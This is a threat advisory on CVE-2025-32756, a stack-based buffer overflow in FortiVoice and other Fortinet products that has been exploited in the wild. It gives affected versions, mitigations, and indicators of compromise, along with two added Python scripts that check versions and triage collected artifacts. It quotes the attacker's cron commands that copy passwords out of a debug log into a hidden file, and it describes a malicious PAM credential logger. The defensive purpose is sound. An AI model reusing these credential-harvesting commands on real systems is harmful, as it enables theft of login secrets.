Threat Insight
CVE-2025-32756: FortiVoice Zero-Day Buffer Overflow Exploited
Fortinet recently published an advisory[1] for a zero-day remote code execution flaw that was found to have been exploited in the wild by an undisclosed threat actor.
The vulnerability is a stack-based buffer overflow affecting multiple Fortinet products: FortiVoice, FortiRecorder, FortiMail, FortiNDR, and FortiCamera.
It allows a remote, unauthenticated attacker to execute arbitrary code or commands by sending HTTP requests carrying a specially crafted hash cookie to the device's web interface.

Successful exploitation of this vulnerability could allow an attacker to:
– execute arbitrary commands and take full control of the affected system,
– access sensitive data held on the device, leading to a data breach,
– pivot to other internal systems, escalate privileges, and compromise additional assets.
The attack can be performed remotely without valid credentials; the only requirement is that the attacker can send HTTP requests to the vulnerable web interface.
Note that fcgi debugging plays no part in triggering the flaw. The threat actor enabled it after compromise in order to log credentials (see Exploitation and Detection below). It is not enabled by default, so finding it on when you have never enabled it yourself is a potential Indicator of Compromise.
CVE
CVE-2025-32756
Affected Products
Product         Branch   Affected versions
FortiCamera     2.1      2.1.0 through 2.1.3
FortiCamera     2.0      all versions
FortiCamera     1.1      all versions
FortiMail       7.6      7.6.0 through 7.6.2
FortiMail       7.4      7.4.0 through 7.4.4
FortiMail       7.2      7.2.0 through 7.2.7
FortiMail       7.0      7.0.0 through 7.0.8
FortiNDR        7.6      7.6.0
FortiNDR        7.4      7.4.0 through 7.4.7
FortiNDR        7.2      7.2.0 through 7.2.4
FortiNDR        7.1      all versions
FortiNDR        7.0      7.0.0 through 7.0.6
FortiNDR        1.5      all versions
FortiNDR        1.4      all versions
FortiNDR        1.3      all versions
FortiNDR        1.2      all versions
FortiNDR        1.1      all versions
FortiRecorder   7.2      7.2.0 through 7.2.3
FortiRecorder   7.0      7.0.0 through 7.0.5
FortiRecorder   6.4      6.4.0 through 6.4.5
FortiVoice      7.2      7.2.0
FortiVoice      7.0      7.0.0 through 7.0.6
FortiVoice      6.4      6.4.0 through 6.4.10
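When checking an inventory against the table above, compare version numbers numerically rather than as strings (7.4.10 sorts after 7.4.4 only when compared numerically). The following is an added example, not code from Fortinet or the advisory: it transcribes the affected ranges and exposes an is_affected() check that accepts version strings as they typically appear in inventories (a leading "v" or a trailing build tag is ignored). Branches outside the table return False; confirm anything newer against the current advisory.

```python
# Added example (not from the Fortinet advisory): offline check of an
# inventory entry against the affected-version table above.
import re

# (product, branch, first affected, last affected); last=None means the
# whole branch is affected. Transcribed from the advisory table.
AFFECTED = [
    ("FortiCamera", "2.1", "2.1.0", "2.1.3"),
    ("FortiCamera", "2.0", None, None),
    ("FortiCamera", "1.1", None, None),
    ("FortiMail", "7.6", "7.6.0", "7.6.2"),
    ("FortiMail", "7.4", "7.4.0", "7.4.4"),
    ("FortiMail", "7.2", "7.2.0", "7.2.7"),
    ("FortiMail", "7.0", "7.0.0", "7.0.8"),
    ("FortiNDR", "7.6", "7.6.0", "7.6.0"),
    ("FortiNDR", "7.4", "7.4.0", "7.4.7"),
    ("FortiNDR", "7.2", "7.2.0", "7.2.4"),
    ("FortiNDR", "7.1", None, None),
    ("FortiNDR", "7.0", "7.0.0", "7.0.6"),
    ("FortiNDR", "1.5", None, None),
    ("FortiNDR", "1.4", None, None),
    ("FortiNDR", "1.3", None, None),
    ("FortiNDR", "1.2", None, None),
    ("FortiNDR", "1.1", None, None),
    ("FortiRecorder", "7.2", "7.2.0", "7.2.3"),
    ("FortiRecorder", "7.0", "7.0.0", "7.0.5"),
    ("FortiRecorder", "6.4", "6.4.0", "6.4.5"),
    ("FortiVoice", "7.2", "7.2.0", "7.2.0"),
    ("FortiVoice", "7.0", "7.0.0", "7.0.6"),
    ("FortiVoice", "6.4", "6.4.0", "6.4.10"),
]


def parse_version(text):
    """Extract the first dotted number in text and return it as an int tuple.
    'v7.4.10,build0432' -> (7, 4, 10). Tuples compare numerically, so
    (7, 4, 10) > (7, 4, 4), which a plain string comparison would get wrong."""
    m = re.search(r"\d+(?:\.\d+)*", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(x) for x in m.group(0).split("."))


def is_affected(product, version):
    """True if (product, version) falls inside an affected range above.
    Product matching is case-insensitive; unknown products or branches
    return False (not listed as affected, which is not the same as fixed)."""
    ver = parse_version(version)
    for prod, branch, low, high in AFFECTED:
        if prod.lower() != product.lower():
            continue
        if ver[:2] != parse_version(branch):
            continue
        if low is None:            # whole branch affected
            return True
        return parse_version(low) <= ver <= parse_version(high)
    return False


if __name__ == "__main__":
    # Constructed inventory rows for the demo.
    for prod, ver in [("FortiVoice", "7.0.6"), ("FortiVoice", "7.0.7"),
                      ("FortiMail", "v7.4.10,build0432"), ("FortiNDR", "7.1.3")]:
        print(prod, ver, "AFFECTED" if is_affected(prod, ver) else "not listed")
```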
Exploitation
Fortinet reported that the vulnerability was actively exploited in the wild, with the observed attacks targeting FortiVoice systems. The company did not describe the extent of the activity or identify the threat actor responsible.
After gaining access, the threat actor was observed scanning the network from compromised devices, deleting system crash logs, and enabling fcgi debugging so that credentials from system logins and SSH login attempts were written to a log it could collect.
Recommended Actions
Users of FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera are strongly encouraged to upgrade to a fixed release to protect their devices from ongoing exploitation attempts.
If immediate patching is not feasible, disable the HTTP/HTTPS administrative interface as a temporary measure. Because the flaw is reached through HTTP requests to that interface, this removes the attack surface until the patch is applied; manage the device through the CLI in the meantime.
Detection
To verify if fcgi debugging is enabled on your system, use the following CLI command:
diag debug application fcgi
If the output shows “general to-file ENABLED”, it means fcgi debugging is enabled on your system:
fcgi debug level is 0x80041
general to-file ENABLED
The following log entries are possible IOCs:
Output of CLI command ‘diagnose debug application httpd display trace-log’:
[x x x x:x:x.x 2025] [fcgid:warn] [pid 1829] [client x.x.x.x:x] mod_fcgid: error reading data, FastCGI server closed connection
[x x x x:x:x.x 2025] [fcgid:error] [pid 1503] mod_fcgid: process /migadmin/www/fcgi/admin.fe(1741) exit(communication error), get unexpected signal 11
IP addresses observed being used by the threat actor:
198[.]105[.]127[.]124
43[.]228[.]217[.]173
43[.]228[.]217[.]82
156[.]236[.]76[.]90
218[.]187[.]69[.]244
218[.]187[.]69[.]59
The following system files may have been modified or added by the threat actor:
– [Added File] /bin/wpad_ac_helper – MD5: 4410352e110f82eabc0bf160bec41d21 – main malware file
– [Added File] /bin/busybox – MD5: ebce43017d2cb316ea45e08374de7315 or 489821c38f429a21e1ea821f8460e590
– /data/etc/crontab – A line was added to grep sensitive data out of fcgi.debug every 12 hours and then truncate it:
0 */12 * * * root busybox grep -rn passw /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug
– /var/spool/cron/crontabs/root – A line was added to copy fcgi.debug aside every 12 hours and then truncate it:
0 */12 * * * root cat /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug
– [Added File] /var/spool/.sync – Credentials harvested by the cron jobs above are written to this file
– /etc/pam.d/sshd – Lines were added to load the malicious libfmlogin.so listed below
– [Added File] /lib/libfmlogin.so – MD5: 364929c45703a84347064e2d5de45bcd – malicious PAM library that logs the username and password of SSH logins
– [Added File] /tmp/.sshdpm – contains credentials gathered by /lib/libfmlogin.so above
– [Added File] /bin/fmtest – MD5: 2c8834a52faee8d87cff7cd09c4fb946 – script used to scan the network
– /etc/httpd.conf – A line was added to load a SOCKS5 proxy module: LoadModule socks5_module modules/mod_socks5.so
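The indicators in this section are easiest to apply offline, against CLI output, log excerpts, a crontab copy and MD5 sums you have already pulled from a device, rather than by eyeballing each one. The following is an added example, not code from Fortinet or the advisory: it transcribes the indicators above (the fcgi debug marker, the admin.fe signal 11 trace-log entry, the attacker IPs, the crontab lines, the file hashes and the mod_socks5 LoadModule line) and reports which ones appear in a set of collected artifacts. The artifact key names and the sample inputs are constructed for the demo; the MD5 for /bin/busybox in the sample is deliberately not one of the known-bad values, to show that an unrecognised hash produces no finding.

```python
# Added example, not part of the Fortinet advisory: offline triage of
# collected device artifacts against the CVE-2025-32756 indicators.
import re

# Indicators transcribed from the advisory text above.
ATTACKER_IPS = {
    "198.105.127.124", "43.228.217.173", "43.228.217.82",
    "156.236.76.90", "218.187.69.244", "218.187.69.59",
}
KNOWN_MD5 = {
    "4410352e110f82eabc0bf160bec41d21": "/bin/wpad_ac_helper (main malware)",
    "ebce43017d2cb316ea45e08374de7315": "/bin/busybox (dropped copy)",
    "489821c38f429a21e1ea821f8460e590": "/bin/busybox (dropped copy)",
    "364929c45703a84347064e2d5de45bcd": "/lib/libfmlogin.so (PAM credential logger)",
    "2c8834a52faee8d87cff7cd09c4fb946": "/bin/fmtest (network scanner)",
}
# admin.fe dying with signal 11 under mod_fcgid is the footprint of the
# overflow being triggered, whether or not the attempt succeeded.
CRASH_RE = re.compile(r"mod_fcgid: process \S*admin\.fe\(\d+\).*signal 11")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def fcgi_debug_enabled(diag_output):
    """True if 'diag debug application fcgi' output shows file logging on."""
    return "general to-file ENABLED" in diag_output


def admin_fe_crashes(trace_log):
    """Lines from 'diagnose debug application httpd display trace-log'
    in which the admin.fe FastCGI process exited on signal 11."""
    return [l for l in trace_log.splitlines() if CRASH_RE.search(l)]


def attacker_ips_seen(log_text):
    """Known attacker IPs appearing anywhere in the supplied log text."""
    return sorted(set(IP_RE.findall(log_text)) & ATTACKER_IPS)


def suspicious_cron_lines(crontab_text):
    """Cron entries that read fcgi.debug or write the .sync collection file."""
    return [l for l in crontab_text.splitlines()
            if "fcgi.debug" in l or "/var/spool/.sync" in l]


def known_bad_hashes(md5_by_path):
    """{path: md5} -> {path: description} for hashes listed in the advisory."""
    return {p: KNOWN_MD5[h.lower()] for p, h in md5_by_path.items()
            if h.lower() in KNOWN_MD5}


def socks_module_loaded(httpd_conf):
    """True if an active (uncommented) LoadModule line pulls in mod_socks5."""
    return any(l.strip().startswith("LoadModule") and "socks5_module" in l
               for l in httpd_conf.splitlines())


def triage(artifacts):
    """artifacts: dict with optional keys 'fcgi_diag', 'httpd_trace', 'logs',
    'crontab', 'md5' (path -> md5) and 'httpd_conf' (key names are this
    example's own). Returns a list of human-readable findings."""
    findings = []
    if fcgi_debug_enabled(artifacts.get("fcgi_diag", "")):
        findings.append("fcgi debugging is enabled (not a default setting)")
    for l in admin_fe_crashes(artifacts.get("httpd_trace", "")):
        findings.append("admin.fe crash: " + l.strip())
    all_logs = artifacts.get("logs", "") + "\n" + artifacts.get("httpd_trace", "")
    for ip in attacker_ips_seen(all_logs):
        findings.append("known attacker IP seen: " + ip)
    for l in suspicious_cron_lines(artifacts.get("crontab", "")):
        findings.append("credential-harvesting cron entry: " + l.strip())
    for path, desc in known_bad_hashes(artifacts.get("md5", {})).items():
        findings.append(f"known malicious file {path}: {desc}")
    if socks_module_loaded(artifacts.get("httpd_conf", "")):
        findings.append("mod_socks5 loaded in /etc/httpd.conf")
    return findings


# Constructed sample artifacts for the demo (not real device output).
SAMPLE = {
    "fcgi_diag": "fcgi debug level is 0x80041\ngeneral to-file ENABLED\n",
    "httpd_trace": (
        "[Tue May 13 10:14:02.1 2025] [fcgid:warn] [pid 1829] [client 43.228.217.82:51342] "
        "mod_fcgid: error reading data, FastCGI server closed connection\n"
        "[Tue May 13 10:14:02.2 2025] [fcgid:error] [pid 1503] mod_fcgid: process "
        "/migadmin/www/fcgi/admin.fe(1741) exit(communication error), get unexpected signal 11\n"
    ),
    "crontab": "0 */12 * * * root busybox grep -rn passw /var/spool/crashlog/fcgi.debug "
               "> /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug\n",
    "md5": {"/bin/wpad_ac_helper": "4410352e110f82eabc0bf160bec41d21",
            "/bin/busybox": "0123456789abcdef0123456789abcdef"},  # unknown hash
    "httpd_conf": "LoadModule socks5_module modules/mod_socks5.so\n",
}

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print("[IOC]", f)
```

Treat a single hit as a reason to preserve the device for forensics before patching: the actor was seen deleting crash logs, so a device that shows only the fcgi debug flag or only the .sync file may already have had the rest cleaned up.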